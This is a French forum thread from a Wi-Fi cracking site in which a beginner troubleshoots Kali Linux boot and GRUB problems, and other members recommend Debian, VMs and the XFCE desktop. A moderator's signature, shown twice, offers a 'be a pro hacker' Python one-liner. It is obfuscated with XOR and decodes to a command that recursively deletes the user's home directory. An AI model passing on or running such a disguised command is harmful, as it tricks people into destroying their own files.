Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 16-11-2013 16:12:34

Fab955
Membre Irremplaçable

Question sur Kali Linux

Bonjour à tous,

Voilà, j'ai deux question concernant Kali Linux qui est la suite de BackTrack.

J'ai installer KALI sur un DD externe d'abord pour un essai. Tout s est bien passé ensuite il à démarrer impec jusque là. N'aimant pas trop ma version Gnome, j'ai un installé le package toolkit KDE via le gestionnaire de téléchargement et de mise à jour et aussi le package toolkit KDE (File). Pensant qu'il fallait les deux, j'ai installé donc les deux sans vraiment réfléchir au lieu d'en mettre un déja voir ce que ca donne. J'ai rebooter ensuite.Il passe tout le script de démarage et au moment ou il demarre Kali, il y a un ecran noir avec le curseur de souris présent et fonctionnel il lit sur le dd quelque seconde s'arrête fait une sorte de reboot de Kali et recommence à l'infinie car dans le script de démarage je vois qu il attend le mot de passe (comme dans BackTrack) mais essaye tout de suite de démarrer Kali sans que j ai le temps de faire quoi que ce soit. Ma question est il y a t'il possibilité de corriger ce problème car il démarre en mode dépanage mais étant débutant je ne sais ce qu'il faut faire. sinon je ferais une ré install. Mais voulant apprendre Linux, si il y a possibilité de corrigé cela je suis preneur.

Ma deuxième question est que à l'installe, il m'a demandé sur quelle dd installé les fichier d'amorçage. Ayant windobe sur le dd interne de mon pc dans la logique je lui ai dit donc sur mon dd interne. Depuis, le pc ne s'amorce pas ni ne boot pas tant que le dd externe n'est pas connecté. Une fois celui-ci connecté, je peux choisir sur quel OS démarrer donc soit windobe soit Kali. Une fois windobe lancer je peux déconnecté le DD externe. Quand le DD externe est déconnecté pourquoi il ne démarre pas sur windobe? Es-ce que j'aurais du lui dire d'installer la section d'amorçage sur le DD externe?

En espérant avoir été assez clair et précis (et dans la bonne section pour  ce problème), j'attend vos éventuelles solutions et conseils avec tout mes remeciements par avance.

Bon  week-end à tous.

Fab.

Ps: Débutant que je suis, me conseillerez-vous de rester sur BackTrack 5r3 ou de passer sur Kali?

Dernière modification par Fab955 (16-11-2013 16:19:40)

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 16-11-2013 17:37:58

spawn
Modérateur

Re : Question sur Kali Linux

Si tu es débutant, je te conseille d'installer debian stable et de jouer aver.
Backtrack n'est qu'une debian avec des options dangereuses pour les débutants comme toi, et plein d'outils pré-livrés.

Tu ferais mieux d'apprendre doucement avec une gentille debian plutôt qu'avec une vilaine kali.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#3 16-11-2013 18:24:11

coyotus
Membre Irremplaçable
Lieu : fort fort lointain

Tu aurais du utiliser une vm avec le disque virtuel sur ton disque externe.
Ensuite il faut lire la doc avant chaque action, la méthode d'installation de KDE est détaillé sur le site officiel.
Puis pourquoi tu veux utiliser Kali, il est préférable de découvrir GNU/Linux via un usage "normal" avec debian.

1310812721.gif

#4 16-11-2013 20:08:03

Fab955
Membre Irremplaçable

J'ai choisi BackTrack car comme précisé dans ma présentation, je m'interesse précisement à la sécurisation des reseaux filaire et non filaire (wifi). Mon dd externe était vide et je l'utilise spécifiquement pour ces essais. La vm ne m'interesse sans plus car il faut tout reconfigurer chaque fois. BackTrack 5r3 est installé en dur sur mon pc fixe en dualboot avec windobe que j'abandonne ptit à ptit. Ça fait environ deux semaines que je farfouille un peu BackTrack un peu partout et le découvre. J'en ai déja appris pas mal grace à vos tutos. Donc si Kali plante, pas grave mon dd externe est là pour ça un formatage et ça repart :-).

#5 17-11-2013 12:49:19

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Puis pourquoi tu veux utiliser Kali, il est préférable de découvrir GNU/Linux via un usage "normal" avec debian.

Pourquoi pas ?
Xubuntu, kali, debian, linux mint... whatever wink

#6 20-11-2013 18:24:16

Fab955
Membre Irremplaçable

Bon tout compte fait, j'ai fait une ré-install de Backtrack 5r3. Kali était trop instable chez moi problème au démarage de la session et il ramait. Puis à vrai dire mon pc n'est pas jeunot. Et j'ai aussi résolu le problème de Grub sur mon dd interne pour windobe avec boot-repair installer en boot sur usb.

Donc je vais poursuivre ma quête avec BackTrack pour le moment.

Le sujet peut donc être clos pour ma part.

Merciiiiiiiiiiiii

Fab

#7 20-11-2013 19:07:01

coyotus
Membre Irremplaçable
Lieu : fort fort lointain

Étrange, j'ai booté Kali sur un HP de plus de 10 ans sans problème, j'ai juste opté pour un environnement de bureau différent (XFCE) mais il ne ramait pas du tout.

1310812721.gif

#8 21-11-2013 12:24:55

Fab955
Membre Irremplaçable

Bonjour coyotus, moi je l'avais installer sur un dd externe connecté à un netbook à la petite config. Il démarrait pas trop mal avec le bureau gnome mais j'aime pas trop on dirait un peu windobe. donc j'avais selectionné le bureau KDE et là il s'est transformé en patate! Ca n'avançait plus. En plus l'install de grub m'avait dérégler mes partition... Pour être sincère j'ai pas essayer les autres bureaux et comme BackTrack fonctionne nikel, démarre extrêmement vite et me convient amplement pour le moment, du coup j'ai remis BackTrack et réparé les fichiers d'amorçage. Je vais rester sur BackTrack pour le moment déjà le temps d'en apprendre un peu plus et après je verrais pour migrer vers une autre distrib.

Voili voilou.

#9 21-11-2013 12:48:33

kcdtv
Membre d'honneur

"KK DE"  tongue

#10 21-11-2013 19:03:44

spawn
Modérateur

Fab955 a écrit :

et là il s'est transformé en patate !

http://www.deviantart.com/#/art/Puptato … 46025?hf=1

De rien.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#11 21-11-2013 19:39:50

Fab955
Membre Irremplaçable

MDR Spawn! Nannnnnnnnnn j'ai pas mis Kali au micro-ondes quand même... Je le garde pour plus tard au frigo tongue

#12 21-11-2013 19:43:51

Fab955
Membre Irremplaçable

Plus sérieusement, le bureau XFCE fonctionne bien et Kali est stable? Car je peux tenter une réinstall de Kali c'est pas le souci si ça fonctionne mieux avec ce bureau. Mon tit dd externe est là pour tout ces essais jusqu'à ce que je trouve LA version qui va me plaire. J'aime bien BackTrack mais comme il est à l'abandon...

#13 22-11-2013 10:04:01

Fab955
Membre Irremplaçable

Salut,

Bon j'ai suivi vos conseils, me revoila avec Kali. j'ai refait l'install hier. Tout fonctionne nikel. J'ai mis le bureau XFCE. Tout fonctionne à merveille. Il devait y avoir eu un problème avec la précédente install pour qu'il tourne moins bien car depuis hier aucun souci avec Kali.

Merci à vous spawn, kcdtv et coyotus.

Dernière modification par Fab955 (22-11-2013 10:06:07)

#14 22-11-2013 11:01:13

kcdtv
Membre d'honneur

cool
je suis sûr que tu vas aprécier le rendement kali + XFCE.
Certes, XFCE es un environeent graphique qui peut parraître un peu simple, sans trop d'effets spéciaux, pas de shade en 3D sur les icones micropixelisés HHHDDDDD high color contsrast dolby stereo; mais c'est stable, fonctionnel et léger.
En ce moment je suis avec un portable sous kali comme système unique, tout tourne parfaitement, et regarde, c'est un P4 qui a presque 10 ans avec un seul noyau à 1.7 Ghz...

Architecture:          i686
CPU op-mode(s):        32-bit
Byte Order:            Little Endian
CPU(s):                1
On-line CPU(s) list:   0
Thread(s) per core:    1
Core(s) per socket:    1
Socket(s):             1
Vendor ID:             GenuineIntel
CPU family:            6
Model:                 14
Stepping:              8
CPU MHz:               1733.399
BogoMIPS:              3466.79
L1d cache:             32K
L1i cache:             32K
L2 cache:              1024K

Aucun soucis, un vrais bonheur

#15 22-11-2013 11:15:41

Fab955
Membre Irremplaçable

Pour le moment chez moi il  tourne sur le netbook à 1,7Ghz simple noyeau atom intel aussi avec 1gb de ram via mon dd externe en usb. Ca va je suis satisfait du bureau XFCE.
plus qu'à installer tout ça sur mon pc fixe en dur aussi voir. Bon à quelque chose près il à la même config il à 8 ans...

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.026 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]